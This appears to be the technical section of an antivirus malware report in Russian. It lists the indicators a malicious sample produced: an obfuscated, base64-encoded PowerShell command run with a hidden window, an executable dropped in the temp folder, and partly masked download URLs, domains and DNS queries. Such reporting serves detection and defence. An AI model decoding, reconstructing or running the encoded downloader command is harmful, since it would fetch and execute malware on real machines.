Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB7AFcAYABzAEMAUgBgAEkAcABUAH0AIAA9ACAALgAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAnAG4AZQB3AC0AbwBiACcALAAnAHQAJwAsACcAagBlAGMAJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADAAfQB7ADEAfQB7AD...
- %TEMP%\39195.exe
- %TEMP%\39195.exe
- 'mi####nniejane.com':80
- 'da##.com.hk':80
- 'fu###studio.org':80
- 'fu###studio.org':443
- 'ar##eb.pt':80
- http://mi####nniejane.com/H/
- http://da##.com.hk/yaeRXq/
- http://fu###studio.org/lEYJk/
- http://ar##eb.pt/VWKngh/
- 'fu###studio.org':443
- DNS ASK mi####nniejane.com
- DNS ASK da##.com.hk
- DNS ASK fu###studio.org
- DNS ASK ar##eb.pt
- DNS ASK gl######trixmarketing.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JAB7AFcAYABzAEMAUgBgAEkAcABUAH0AIAA9ACAALgAoACIAewAwAH0AewAyAH0AewAxAH0AIgAgAC0AZgAnAG4AZQB3AC0AbwBiACcALAAnAHQAJwAsACcAagBlAGMAJwApACAALQBDAG8AbQBPAGIAagBlAGMAdAAgACgAIgB7ADAAfQB7ADEAfQB7AD... (со скрытым окном)